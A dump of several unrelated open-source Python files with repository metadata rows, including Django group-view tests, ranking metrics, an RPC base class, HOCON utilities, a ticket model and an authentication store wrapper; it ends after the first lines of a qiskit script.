        self.group_profile = group_profile(group=group(save=True), save=True)
        self.client.login(username=self.user.username, password='testpass')
    def _verify_get_and_post(self):
        # Shared assertions: the edit page renders (200) and a POST updates
        # the profile information, redirecting (302) on success.
        slug = self.group_profile.slug
        # Verify GET
        r = self.client.get(reverse('groups.edit', args=[slug]), follow=True)
        eq_(r.status_code, 200)
        # Verify POST
        r = self.client.post(reverse('groups.edit', locale='en-US',
                                     args=[slug]),
                             {'information': '=new info='})
        eq_(r.status_code, 302)
        gp = GroupProfile.uncached.get(slug=slug)
        eq_(gp.information, '=new info=')
    def test_edit_with_perm(self):
        # The change_groupprofile permission grants edit access.
        add_permission(self.user, GroupProfile, 'change_groupprofile')
        self._verify_get_and_post()
    def test_edit_as_leader(self):
        # Group leaders can edit without the explicit permission.
        self.group_profile.leaders.add(self.user)
        self._verify_get_and_post()
    def test_edit_without_perm(self):
        # Without permission or leadership, both GET and POST are forbidden.
        slug = self.group_profile.slug
        # Try GET
        r = self.client.get(reverse('groups.edit', args=[slug]), follow=True)
        eq_(r.status_code, 403)
        # Try POST
        r = self.client.post(reverse('groups.edit', locale='en-US',
                                     args=[slug]),
                             {'information': '=new info='})
        eq_(r.status_code, 403)
class EditAvatarTests(TestCase):
    """Tests for uploading and deleting a group avatar."""
    def setUp(self):
        super(EditAvatarTests, self).setUp()
        self.user = user(save=True)
        add_permission(self.user, GroupProfile, 'change_groupprofile')
        self.group_profile = group_profile(group=group(save=True), save=True)
        self.client.login(username=self.user.username, password='testpass')
    def tearDown(self):
        # Remove any uploaded avatar file so tests don't leave files behind.
        if self.group_profile.avatar:
            self.group_profile.avatar.delete()
        super(EditAvatarTests, self).tearDown()
    def test_upload_avatar(self):
        """Upload a group avatar."""
        # Seed an existing avatar so the upload must replace it on disk.
        with open('apps/upload/tests/media/test.jpg') as f:
            self.group_profile.avatar.save('test_old.jpg', File(f), save=True)
        assert self.group_profile.avatar.name.endswith('92b516.jpg')
        old_path = self.group_profile.avatar.path
        assert os.path.exists(old_path), 'Old avatar is not in place.'
        url = reverse('groups.edit_avatar', locale='en-US',
                      args=[self.group_profile.slug])
        with open('apps/upload/tests/media/test.jpg') as f:
            r = self.client.post(url, {'avatar': f})
        eq_(302, r.status_code)
        url = reverse('groups.profile', args=[self.group_profile.slug])
        eq_('http://testserver/en-US' + url, r['location'])
        assert not os.path.exists(old_path), 'Old avatar was not removed.'
    def test_delete_avatar(self):
        """Delete a group avatar."""
        # Reuse the upload test to put an avatar in place first.
        self.test_upload_avatar()
        url = reverse('groups.delete_avatar', locale='en-US',
                      args=[self.group_profile.slug])
        r = self.client.get(url)
        eq_(200, r.status_code)
        r = self.client.post(url)
        eq_(302, r.status_code)
        url = reverse('groups.profile', args=[self.group_profile.slug])
        eq_('http://testserver/en-US' + url, r['location'])
        gp = GroupProfile.uncached.get(slug=self.group_profile.slug)
        eq_('', gp.avatar.name)
class AddRemoveMemberTests(TestCase):
    """Tests for adding and removing group members via the views."""
    def setUp(self):
        super(AddRemoveMemberTests, self).setUp()
        # The acting user needs change_groupprofile to manage membership.
        self.user = user(save=True)
        self.member = user(save=True)
        add_permission(self.user, GroupProfile, 'change_groupprofile')
        self.group_profile = group_profile(group=group(save=True), save=True)
        self.client.login(username=self.user.username, password='testpass')
    def test_add_member(self):
        # GET is not allowed (405); POST adds the user and redirects.
        url = reverse('groups.add_member', locale='en-US',
                      args=[self.group_profile.slug])
        r = self.client.get(url)
        eq_(405, r.status_code)
        r = self.client.post(url, {'users': self.member.username})
        eq_(302, r.status_code)
        assert self.member in self.group_profile.group.user_set.all()
    def test_remove_member(self):
        # GET shows a confirmation page (200); POST removes and redirects.
        self.member.groups.add(self.group_profile.group)
        url = reverse('groups.remove_member', locale='en-US',
                      args=[self.group_profile.slug, self.member.id])
        r = self.client.get(url)
        eq_(200, r.status_code)
        r = self.client.post(url)
        eq_(302, r.status_code)
        # PEP 8 `not in` replaces the original `assert not x in y`.
        assert self.member not in self.group_profile.group.user_set.all()
class AddRemoveLeaderTests(TestCase):
    """Tests for adding and removing group leaders via the views."""
    def setUp(self):
        super(AddRemoveLeaderTests, self).setUp()
        # The acting user needs change_groupprofile to manage leaders.
        self.user = user(save=True)
        add_permission(self.user, GroupProfile, 'change_groupprofile')
        self.leader = user(save=True)
        self.group_profile = group_profile(group=group(save=True), save=True)
        self.client.login(username=self.user.username, password='testpass')
    def test_add_leader(self):
        # GET is not allowed (405); POST adds the leader and redirects.
        url = reverse('groups.add_leader', locale='en-US',
                      args=[self.group_profile.slug])
        r = self.client.get(url)
        eq_(405, r.status_code)
        r = self.client.post(url, {'users': self.leader.username})
        eq_(302, r.status_code)
        assert self.leader in self.group_profile.leaders.all()
    def test_remove_leader(self):
        # Renamed from the copy-pasted `test_remove_member`: this test
        # removes a *leader*. GET shows a confirmation page; POST removes.
        self.group_profile.leaders.add(self.leader)
        url = reverse('groups.remove_leader', locale='en-US',
                      args=[self.group_profile.slug, self.leader.id])
        r = self.client.get(url)
        eq_(200, r.status_code)
        r = self.client.post(url)
        eq_(302, r.status_code)
        # PEP 8 `not in` replaces the original `assert not x in y`.
        assert self.leader not in self.group_profile.leaders.all()
class JoinContributorsTests(TestCase):
    """Tests for the join-contributors shortcut view."""
    def setUp(self):
        super(JoinContributorsTests, self).setUp()
        self.user = user(save=True)
        self.client.login(username=self.user.username, password='testpass')
        # The view adds users to this pre-existing group.
        group(name='Contributors', save=True)
    def test_join_contributors(self):
        # GET is rejected (405); POST joins the group and redirects to
        # the `next` URL passed in the querystring.
        next = reverse('groups.list')
        url = reverse('groups.join_contributors', locale='en-US')
        url = urlparams(url, next=next)
        r = self.client.get(url)
        eq_(405, r.status_code)
        r = self.client.post(url)
        eq_(302, r.status_code)
        eq_('http://testserver%s' % next, r['location'])
        assert self.user.groups.filter(name='Contributors').exists()
6765f3048b69f9823d05eedd7cc73f51d29a31bb | 825 | py | Python | bayes_nn/models/base_model.py | rnagumo/bayes_nn | 3a6ee31d1dcc9a7f8d2dfb0aadf180c443915931 | [
"MIT"
] | null | null | null | bayes_nn/models/base_model.py | rnagumo/bayes_nn | 3a6ee31d1dcc9a7f8d2dfb0aadf180c443915931 | [
"MIT"
] | null | null | null | bayes_nn/models/base_model.py | rnagumo/bayes_nn | 3a6ee31d1dcc9a7f8d2dfb0aadf180c443915931 | [
"MIT"
] | null | null | null | from torch import Tensor, nn
class BaseModel(nn.Module):
    """Abstract base class for Bayesian neural-network models.

    Subclasses must implement `forward`, `sample`, and `loss_func`.
    """

    def forward(self, x: Tensor) -> tuple[Tensor, Tensor]:
        """Predict the target distribution for the given features.

        Args:
            x: Input features.

        Returns:
            Tuple ``(mean, var)`` of the prediction.
        """
        raise NotImplementedError

    def sample(self, x: Tensor) -> Tensor:
        """Draw target predictions via Monte Carlo sampling.

        Args:
            x: Input features.

        Returns:
            Predictions with the Monte Carlo sample axis first.
        """
        raise NotImplementedError

    def loss_func(self, x: Tensor, y: Tensor) -> dict[str, Tensor]:
        """Compute training losses.

        Args:
            x: Features.
            y: Targets.

        Returns:
            Dict of losses, each of shape ``(batch,)``.
        """
        raise NotImplementedError
5ea121614078a1b9eebec913039231eec7bed0a4 | 5,347 | py | Python | pyltr/metrics/_metrics.py | rit-git/pyltr | c18e24fc18a1099ee3cac06b71d09f09545458bb | [
"BSD-3-Clause"
] | null | null | null | pyltr/metrics/_metrics.py | rit-git/pyltr | c18e24fc18a1099ee3cac06b71d09f09545458bb | [
"BSD-3-Clause"
] | null | null | null | pyltr/metrics/_metrics.py | rit-git/pyltr | c18e24fc18a1099ee3cac06b71d09f09545458bb | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from sklearn.externals.six.moves import range
from ..util.group import check_qids, get_groups
from ..util.sort import get_sorted_y
class Metric(object):
    """Base LTR metric class.
    Subclasses must override evaluate() and can optionally override various
    other methods.
    """
    def evaluate(self, qid, targets):
        """Evaluates the metric on a ranked list of targets.
        Parameters
        ----------
        qid : object
            Query id. Guaranteed to be a hashable type s.t.
            ``sorted(targets1) == sorted(targets2)`` iff ``qid1 == qid2``.
        targets : array_like of shape = [n_targets]
            List of targets for the query, in order of predicted score.
        Returns
        -------
        float
            Value of the metric on the provided list of targets.
        """
        raise NotImplementedError()
    def calc_swap_deltas(self, qid, targets):
        """Returns an upper triangular matrix.
        Each (i, j) contains the change in the metric from swapping
        targets[i, j].
        Parameters
        ----------
        qid : object
            See `evaluate`.
        targets : array_like of shape = [n_targets]
            See `evaluate`.
        Returns
        -------
        deltas = array_like of shape = [n_targets, n_targets]
            Upper triangular matrix, where ``deltas[i, j]`` is the change in
            the metric from swapping ``targets[i]`` with ``targets[j]``.
        """
        n_targets = len(targets)
        deltas = np.zeros((n_targets, n_targets))
        original = self.evaluate(qid, targets)
        max_k = self.max_k()
        # Only rows below the metric's cutoff can change the value.
        if max_k is None or n_targets < max_k:
            max_k = n_targets
        for i in range(max_k):
            for j in range(i + 1, n_targets):
                # Swap i and j, evaluate, then swap back to restore order.
                tmp = targets[i]
                targets[i] = targets[j]
                targets[j] = tmp
                deltas[i, j] = self.evaluate(qid, targets) - original
                tmp = targets[i]
                targets[i] = targets[j]
                targets[j] = tmp
        return deltas
    def max_k(self):
        """Returns a cutoff value for the metric.
        Returns
        -------
        k : int or None
            Value for which ``swap_delta()[i, j] == 0 for all i, j >= k``.
            None if no such value.
        """
        return None
    def evaluate_preds(self, qid, targets, preds):
        """Evaluates the metric on a ranked list of targets.
        Parameters
        ----------
        qid : object
            See `evaluate`.
        targets : array_like of shape = [n_targets]
            See `evaluate`.
        preds : array_like of shape = [n_targets]
            List of predicted scores corresponding to the targets. The
            `targets` array will be sorted by these predictions before
            evaluation.
        Returns
        -------
        float
            Value of the metric on the provided list of targets and
            predictions.
        """
        return self.evaluate(qid, get_sorted_y(targets, preds))
    def calc_random_ev(self, qid, targets):
        """Calculates the expectied value of the metric on randomized targets.
        This implementation just averages the metric over 100 shuffles.
        Parameters
        ----------
        qid : object
            See `evaluate`.
        targets : array_like of shape = [n_targets]
            See `evaluate`.
        Returns
        -------
        float
            Expected value of the metric from random ordering of targets.
        """
        # Copy so the caller's target ordering is not disturbed.
        targets = np.copy(targets)
        scores = []
        for _ in range(100):
            np.random.shuffle(targets)
            scores.append(self.evaluate(qid, targets))
        return np.mean(scores)
    def calc_mean(self, qids, targets, preds):
        """Calculates the mean of the metric among the provided predictions.
        Parameters
        ----------
        qids : array_like of shape = [n_targets]
            List of query ids. They must be grouped contiguously
            (i.e. ``pyltr.util.group.check_qids`` must pass).
        targets : array_like of shape = [n_targets]
            List of targets.
        preds : array_like of shape = [n_targets]
            List of predicted scores corresponding to the targets.
        Returns
        -------
        float
            Mean of the metric over provided query groups.
        """
        check_qids(qids)
        query_groups = get_groups(qids)
        # (qid, a, b) gives the half-open slice [a, b) of each query group.
        return np.mean([self.evaluate_preds(qid, targets[a:b], preds[a:b])
                        for qid, a, b in query_groups])
    def calc_mean_random(self, qids, targets):
        """Calculates the EV of the mean of the metric with random ranking.
        Parameters
        ----------
        qids : array_like of shape = [n_targets]
            See `calc_mean`.
        targets : array_like of shape = [n_targets]
            See `calc_mean`.
        Returns
        -------
        float
            Expected value of the mean of the metric on random orderings of the
            provided query groups.
        """
        check_qids(qids)
        query_groups = get_groups(qids)
        return np.mean([self.calc_random_ev(qid, targets[a:b])
                        for qid, a, b in query_groups])
c9ab3257341041275cba3422d1e31953485173c5 | 1,534 | py | Python | vega/algorithms/nas/modnas/estim/dist_backend/base.py | shaido987/vega | 14d5d49fb8bdf96bd1f3fcfac201ce6b6712c3b6 | [
"MIT"
] | 1 | 2021-05-08T07:47:44.000Z | 2021-05-08T07:47:44.000Z | vega/algorithms/nas/modnas/estim/dist_backend/base.py | WholeG/vega | d1ccf1c3ce68a118bdb6775594ceed0f895911e7 | [
"MIT"
] | null | null | null | vega/algorithms/nas/modnas/estim/dist_backend/base.py | WholeG/vega | d1ccf1c3ce68a118bdb6775594ceed0f895911e7 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Distributed remote client and server."""
import threading
class RemoteBase():
    """Base class for a distributed remote client.

    Dispatches remote procedure calls on a background thread and reports
    completion or failure through caller-supplied callbacks. Subclasses
    must implement `rpc`.
    """

    def __init__(self):
        super().__init__()
        # Callbacks registered by the most recent `call`.
        self.on_done = None
        self.on_failed = None

    def call(self, func, *args, on_done=None, on_failed=None, **kwargs):
        """Invoke `func` remotely on a background thread, with callbacks."""
        self.on_done = on_done
        self.on_failed = on_failed
        worker = threading.Thread(target=self.rpc, args=(func,) + args, kwargs=kwargs)
        self.th_rpc = worker
        worker.start()

    def rpc(self, func, *args, **kwargs):
        """Execute `func` on the remote side (subclass responsibility)."""
        raise NotImplementedError

    def on_rpc_done(self, ret):
        """Record the result and fire the completion callback."""
        self.ret = ret
        self.on_done(ret)

    def on_rpc_failed(self, ret):
        """Fire the failure callback."""
        self.on_failed(ret)
class WorkerBase():
    """Base class for a distributed remote worker (server side)."""

    def run(self, estim):
        """Serve requests for ``estim`` (subclass responsibility)."""
        raise NotImplementedError
| 30.078431 | 91 | 0.656454 |
5deabb197de5178e0fc51d7afd905b317e49c586 | 2,446 | py | Python | hocon/util.py | chris-martin/hocon-python | 4d94595d531ef8cd69a086dbb5cb65550d8d456e | [
"Apache-2.0"
] | 3 | 2017-01-23T09:16:09.000Z | 2018-06-06T17:00:35.000Z | hocon/util.py | chris-martin/hocon-python | 4d94595d531ef8cd69a086dbb5cb65550d8d456e | [
"Apache-2.0"
] | null | null | null | hocon/util.py | chris-martin/hocon-python | 4d94595d531ef8cd69a086dbb5cb65550d8d456e | [
"Apache-2.0"
] | 1 | 2019-03-21T01:55:47.000Z | 2019-03-21T01:55:47.000Z | """
Contains static utility methods.
"""
from .impl import util as impl_util
def quote_string(s):
    """Quote and escape a string, as in the JSON specification.

    Ported from the Java API ``public static String quoteString(String s)``.

    :param s: a string
    :return: the string quoted and escaped
    """
    return impl_util.render_json_string(s)
def join_path(*elements):
    """Convert a sequence of keys to a path expression.

    Each path element is quoted as needed and the results are joined with
    periods.  A path expression is usable with a ``Config``, while individual
    path elements are usable with a ``ConfigObject``.  (Ported from the Java
    overloads ``joinPath(String...)`` and ``joinPath(List<String>)``; the
    variadic arguments are forwarded to ``impl_util.join_path`` as a tuple.)

    :param elements: the keys in the path
    :return: a path expression
    :raises ConfigException: if no elements are given
    """
    return impl_util.join_path(elements)
def split_path(path):
    """Convert a path expression into a list of keys.

    Splits on periods and unquotes the individual path elements.  A path
    expression is usable with a ``Config``, while individual path elements
    are usable with a ``ConfigObject``.  (Ported from the Java API
    ``public static List<String> splitPath(String path)``.)

    :param path: a path expression
    :return: the individual keys in the path
    :raises ConfigException: if the path expression is invalid
    """
    return impl_util.split_path(path)
| 31.358974 | 80 | 0.638185 |
c8024bb909c24855dbf1b7a05c149e764b775382 | 13,382 | py | Python | livestyled/models/ticket.py | livestyled/python-sdk | e75263e8bbf7132e4ce0e69d0ca3ad19088661b2 | [
"MIT"
] | null | null | null | livestyled/models/ticket.py | livestyled/python-sdk | e75263e8bbf7132e4ce0e69d0ca3ad19088661b2 | [
"MIT"
] | 1 | 2020-05-21T10:01:07.000Z | 2020-05-21T10:01:07.000Z | livestyled/models/ticket.py | livestyled/python-sdk | e75263e8bbf7132e4ce0e69d0ca3ad19088661b2 | [
"MIT"
] | null | null | null | from livestyled.models.app import Currency
from livestyled.models.event import Event, EventDate
from livestyled.models.ticket_integration import TicketIntegration
from livestyled.models.user import User
from livestyled.models.venue import Venue
class Ticket:
    """Domain model for an event ticket, including sharing/redemption state.

    Related records (user, sharer, redeemer, parent ticket, event, event
    date, venue, currency, ticket integration) may be supplied as model
    instances, raw ids, or dicts; bare ids are wrapped in lightweight
    ``placeholder`` objects.

    Bug fixes relative to the previous revision:
    - ``create_new`` used ``isinstance(x, (str or int))``, which evaluates to
      ``isinstance(x, str)`` and therefore silently skipped integer ids for
      ``sharer``, ``redeemer`` and ``parent_ticket``.
    - The type-dispatch chains in ``__init__`` left the corresponding
      attribute *unset* for truthy values of an unexpected type (including a
      real ``Ticket`` passed as ``parent_ticket``), causing AttributeError
      later; they now always assign, falling back to ``None``.
    """

    def __init__(
            self,
            id,
            external_ticket_id,
            external_movement_id,
            seat,
            qr_code_url,
            title,
            legacy_external_event_id,
            external_event_id,
            barcode,
            sector_name,
            venue_name,
            venue_room,
            client_name,
            premium,
            client_email,
            price,
            share_link,
            external_customer_ref,
            entrance,
            section,
            row,
            price_code,
            created_at,
            updated_at,
            user_id,
            status,
            session_date=None,
            can_share=False,
            sharer_email=None,
            sharer_id=None,
            redeemed_at=None,
            redeemer_id=None,
            share_code=None,
            redeemer_email=None,
            parent_ticket=None,
            shared_at=None,
            legal_long_text=None,
            legal_short_text=None,
            map_url=None,
            map_image_url=None,
            ticket_integration=None,
            venue=None,
            event=None,
            ticket_auth=None,
            event_date=None,
            currency=None,
            external_card_ref=None,
            additional_fields=None
    ):
        # NOTE: ``ticket_auth`` is accepted for API compatibility but is not
        # stored on the instance (same as the original implementation).
        self.id = id
        self.external_ticket_id = external_ticket_id
        self.external_movement_id = external_movement_id
        self.seat = seat
        self.qr_code_url = qr_code_url
        self.session_date = session_date
        self.title = title
        self.legacy_external_event_id = legacy_external_event_id
        self.external_event_id = external_event_id
        self.barcode = barcode
        self.sector_name = sector_name
        self.venue_name = venue_name
        self.venue_room = venue_room
        self.client_name = client_name
        self.premium = premium
        self.client_email = client_email
        self.price = price
        self.created_at = created_at
        self.updated_at = updated_at
        self.share_link = share_link
        self.external_customer_ref = external_customer_ref
        self.entrance = entrance
        self.section = section
        self.row = row
        self.price_code = price_code
        # Related users are stored as placeholders resolved by id.
        if user_id:
            self._user = User.placeholder(id=user_id)
        else:
            self._user = None
        self.status = status
        self.can_share = can_share
        self.sharer_email = sharer_email
        self.redeemed_at = redeemed_at
        self.share_code = share_code
        self.redeemer_email = redeemer_email
        self.shared_at = shared_at
        self.external_card_ref = external_card_ref
        if sharer_id:
            self._sharer = User.placeholder(id=sharer_id)
        else:
            self._sharer = None
        if redeemer_id:
            self._redeemer = User.placeholder(id=redeemer_id)
        else:
            self._redeemer = None
        # Parent ticket: accept a Ticket, a dict of constructor kwargs, or an
        # id; anything else (or a falsy value) maps to None.
        if not parent_ticket:
            self._parent_ticket = None
        elif isinstance(parent_ticket, Ticket):
            self._parent_ticket = parent_ticket
        elif isinstance(parent_ticket, dict):
            self._parent_ticket = Ticket(**parent_ticket)
        elif isinstance(parent_ticket, (int, str)):
            self._parent_ticket = Ticket.placeholder(id=int(parent_ticket))
        else:
            self._parent_ticket = None
        self.legal_long_text = legal_long_text
        self.legal_short_text = legal_short_text
        self.map_url = map_url
        self.map_image_url = map_image_url
        if not ticket_integration:
            self._ticket_integration = None
        elif isinstance(ticket_integration, TicketIntegration):
            self._ticket_integration = ticket_integration
        elif isinstance(ticket_integration, dict):
            self._ticket_integration = TicketIntegration(**ticket_integration)
        elif isinstance(ticket_integration, (int, str)):
            self._ticket_integration = TicketIntegration.placeholder(ticket_integration)
        else:
            self._ticket_integration = None
        if not event:
            self.event = None
        elif isinstance(event, Event):
            self.event = event
        elif isinstance(event, (int, str)):
            self.event = Event.placeholder(id=event)
        elif isinstance(event, dict):
            self.event = Event(**event)
        else:
            self.event = None
        if not event_date:
            self.event_date = None
        elif isinstance(event_date, EventDate):
            self.event_date = event_date
        elif isinstance(event_date, (int, str)):
            self.event_date = EventDate.placeholder(id=event_date)
        elif isinstance(event_date, dict):
            self.event_date = EventDate(**event_date)
        else:
            self.event_date = None
        if not venue:
            self.venue = None
        elif isinstance(venue, Venue):
            self.venue = venue
        elif isinstance(venue, (int, str)):
            self.venue = Venue.placeholder(id=venue)
        elif isinstance(venue, dict):
            self.venue = Venue(**venue)
        else:
            self.venue = None
        if not currency:
            self.currency = None
        elif isinstance(currency, Currency):
            self.currency = currency
        elif isinstance(currency, (int, str)):
            self.currency = Currency.placeholder(id=currency)
        elif isinstance(currency, dict):
            self.currency = Currency(**currency)
        else:
            self.currency = None
        self.additional_fields = additional_fields

    @classmethod
    def placeholder(
            cls,
            id
    ):
        """Return a skeletal Ticket carrying only an id (for lazy references)."""
        return cls(
            id=id,
            external_ticket_id=None,
            external_movement_id=None,
            seat=None,
            qr_code_url=None,
            title=None,
            legacy_external_event_id=None,
            external_event_id=None,
            barcode=None,
            sector_name=None,
            venue_name=None,
            venue_room=None,
            client_name=None,
            premium=None,
            client_email=None,
            price=None,
            share_link=None,
            external_customer_ref=None,
            entrance=None,
            section=None,
            row=None,
            price_code=None,
            created_at=None,
            updated_at=None,
            user_id=None,
            status=None,
            session_date=None,
            can_share=False,
            sharer_email=None,
            sharer_id=None,
            redeemed_at=None,
            redeemer_id=None,
            share_code=None,
            redeemer_email=None,
            parent_ticket=None,
            shared_at=None,
            legal_long_text=None,
            legal_short_text=None,
            map_url=None,
            map_image_url=None,
            ticket_integration=None,
            venue=None,
            event=None,
            currency=None,
            external_card_ref=None,
            additional_fields=None,
        )

    @classmethod
    def create_new(
            cls,
            user: User or str or int,
            external_ticket_id=None,
            external_movement_id=None,
            seat=None,
            qr_code_url=None,
            session_date=None,
            title=None,
            legacy_external_event_id=None,
            external_event_id=None,
            barcode=None,
            sector_name=None,
            venue_name=None,
            venue_room=None,
            client_name=None,
            premium=False,
            client_email=None,
            price=0,
            row=None,
            section=None,
            share_link=None,
            external_customer_ref=None,
            price_code=None,
            entrance=None,
            status=None,
            can_share=False,
            sharer_email=None,
            sharer: User or str or int or None = None,
            redeemed_at=None,
            redeemer: User or str or int or None = None,
            share_code=None,
            redeemer_email=None,
            parent_ticket=None,
            shared_at=None,
            legal_long_text=None,
            legal_short_text=None,
            map_url=None,
            map_image_url=None,
            ticket_integration=None,
            venue: Venue or str or int or None = None,
            event: Event or str or int or None = None,
            currency: Currency or None = None,
            external_card_ref=None,
            additional_fields=None,
    ):
        """Build a new (unsaved) Ticket; id-like user/sharer/redeemer/parent
        arguments are wrapped in placeholders."""
        ticket = Ticket(
            id=None,
            external_ticket_id=external_ticket_id,
            external_movement_id=external_movement_id,
            seat=seat,
            qr_code_url=qr_code_url,
            session_date=session_date,
            title=title,
            legacy_external_event_id=legacy_external_event_id,
            external_event_id=external_event_id,
            barcode=barcode,
            sector_name=sector_name,
            venue_name=venue_name,
            venue_room=venue_room,
            client_name=client_name,
            premium=premium,
            client_email=client_email,
            price=price,
            created_at=None,
            updated_at=None,
            share_link=share_link,
            external_customer_ref=external_customer_ref,
            entrance=entrance,
            section=section,
            row=row,
            price_code=price_code,
            user_id=None,
            status=status,
            can_share=can_share,
            sharer_email=sharer_email,
            sharer_id=None,
            redeemed_at=redeemed_at,
            redeemer_id=None,
            share_code=share_code,
            redeemer_email=redeemer_email,
            parent_ticket=None,
            shared_at=shared_at,
            legal_long_text=legal_long_text,
            legal_short_text=legal_short_text,
            map_url=map_url,
            map_image_url=map_image_url,
            ticket_integration=ticket_integration,
            venue=venue,
            event=event,
            currency=currency,
            external_card_ref=external_card_ref,
            additional_fields=additional_fields
        )
        if isinstance(user, (str, int)):
            user = User.placeholder(id=user)
        ticket._user = user
        # BUG FIX: these three checks used ``(str or int)`` which is just
        # ``str`` -- integer ids were previously assigned unwrapped.
        if isinstance(sharer, (str, int)):
            sharer = User.placeholder(id=sharer)
        ticket._sharer = sharer
        if isinstance(redeemer, (str, int)):
            redeemer = User.placeholder(id=redeemer)
        ticket._redeemer = redeemer
        if isinstance(parent_ticket, (str, int)):
            parent_ticket = Ticket.placeholder(id=parent_ticket)
        ticket._parent_ticket = parent_ticket
        return ticket

    @property
    def user_id(self):
        """Id of the owning user, or None when unowned."""
        if self._user:
            return self._user.id
        else:
            return None

    @property
    def user(self):
        return self._user

    @property
    def redeemer_id(self):
        """Id of the redeeming user, or None if not redeemed."""
        if self._redeemer:
            return self._redeemer.id
        else:
            return None

    @property
    def redeemer(self):
        return self._redeemer

    @property
    def sharer_id(self):
        """Id of the sharing user, or None if not shared."""
        if self._sharer:
            return self._sharer.id
        else:
            return None

    @property
    def sharer(self):
        return self._sharer

    @property
    def parent_ticket(self):
        return self._parent_ticket

    @property
    def ticket_integration(self):
        return self._ticket_integration

    def __repr__(self):
        return '<Ticket(id={self.id!r})>'.format(self=self)

    def diff(self, other):
        """Return a dict of fields where ``self`` differs from ``other``.

        ``additional_fields`` gets special treatment: entries of ``other``
        are merged with the entries of ``self`` that share the same 'sort'
        value, so the diff preserves ``other``'s entry order.
        """
        differences = {}
        fields = (
            'external_ticket_id', 'seat', 'qr_code_url', 'session_date', 'title', 'legacy_external_event_id',
            'external_event_id', 'barcode', 'sector_name', 'venue_name', 'venue_room', 'client_name', 'premium',
            'client_email', 'price', 'status', 'can_share', 'sharer_email', 'redeemed_at', 'redeemer_id', 'share_code',
            'redeemer_email', 'parent_ticket', 'shared_at', 'legal_long_text', 'legal_short_text', 'map_url',
            'map_image_url', 'ticket_integration', 'entrance', 'row', 'section', 'price_code', 'external_customer_ref',
            'venue', 'event', 'event_date', 'currency', 'external_card_ref', 'additional_fields'
        )
        for field in fields:
            if getattr(self, field) != getattr(other, field):
                if field == 'additional_fields' and getattr(other, field):
                    if getattr(self, field):
                        additional_fields = []
                        for current in getattr(other, field):
                            for new in getattr(self, field):
                                if current['sort'] == new['sort']:
                                    for key in current.keys():
                                        current[key] = new[key]
                            additional_fields.append(current)
                        differences[field] = additional_fields
                else:
                    differences[field] = getattr(self, field)
        return differences
| 33.538847 | 119 | 0.555747 |
3b75c9e21a59f06a0a71ac339b153e617a2a809f | 2,228 | py | Python | Store/AuthStore.py | uscope-platform/uscope_server | d8679c1aea0210ed80375a2b071b5971ce7a7232 | [
"Apache-2.0"
] | null | null | null | Store/AuthStore.py | uscope-platform/uscope_server | d8679c1aea0210ed80375a2b071b5971ce7a7232 | [
"Apache-2.0"
] | null | null | null | Store/AuthStore.py | uscope-platform/uscope_server | d8679c1aea0210ed80375a2b071b5971ce7a7232 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 University of Nottingham Ningbo China
# Author: Filippo Savi <filssavi@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime as dt
from sqlalchemy.orm import declarative_base, sessionmaker
from sqlalchemy import create_engine
from .Elements import Users
class AuthStore:
    """Persistence facade for users and authentication tokens.

    Wraps ``Users.AuthenticationDatabase`` behind a small API so callers do
    not deal with SQLAlchemy sessions directly.
    """

    def __init__(self, host):
        """Connect to the database at ``host`` (a SQLAlchemy URL)."""
        self.engine = create_engine(host)
        Base = declarative_base()
        # NOTE(review): this Base is freshly created here, so no tables are
        # registered on it and create_all() is likely a no-op; the schema
        # presumably lives on the models' own declarative base -- confirm.
        Base.metadata.create_all(self.engine)
        self.Session = sessionmaker(bind=self.engine)
        self.auth_db = Users.AuthenticationDatabase(self.Session)

    # PERIPHERALS
    def get_users_list(self):
        """Return the list of known users."""
        return self.auth_db.get_users_list()

    def add_user(self, content):
        """Create a user from a dict with 'username', 'pw_hash' and 'role'."""
        self.auth_db.add_user(content['username'], content['pw_hash'], content['role'])

    def user_exists(self, username):
        """Return whether ``username`` is a known user.

        Bug fix: the underlying result was previously computed but not
        returned, so this method always yielded None.
        """
        return self.auth_db.user_exists(username)

    def get_password_hash(self, username):
        """Return the stored password hash for ``username``."""
        return self.auth_db.get_password_hash(username)

    def get_user(self, username):
        """Return the user record for ``username``."""
        return self.auth_db.get_user(username)

    def remove_user(self, username):
        """Delete ``username`` from the store."""
        self.auth_db.remove_user(username)

    def get_token(self, selector):
        """Return the token for ``selector`` as a plain dict (expiry as POSIX timestamp)."""
        token = self.auth_db.get_token(selector)
        return {'username': token.username, 'expiry': token.expiry.timestamp(), 'validator': token.validator}

    def add_token(self, selector, token_obj):
        """Store a token; ``token_obj['expiry']`` is a POSIX timestamp."""
        timestamp = dt.datetime.fromtimestamp(token_obj['expiry'])
        self.auth_db.add_token(token_obj['username'], timestamp, token_obj['validator'], selector)

    def dump(self):
        """Serialize the whole authentication database."""
        return self.auth_db.dump()

    def restore(self, data):
        """Restore the authentication database from ``dump()`` output."""
        self.auth_db.restore(data)

    def remove_token(self, username):
        # Intentionally unimplemented in the original code; kept as a no-op.
        pass
| 31.828571 | 109 | 0.714542 |
f176e0af78a2811b7765aecca020ed3f225299c3 | 3,134 | py | Python | data/p2DJ/New/program/qiskit/class/startQiskit_Class199.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p2DJ/New/program/qiskit/class/startQiskit_Class199.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p2DJ/New/program/qiskit/class/startQiskit_Class199.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=2
# total number=11
import cirq
import qiskit
from qiskit import IBMQ
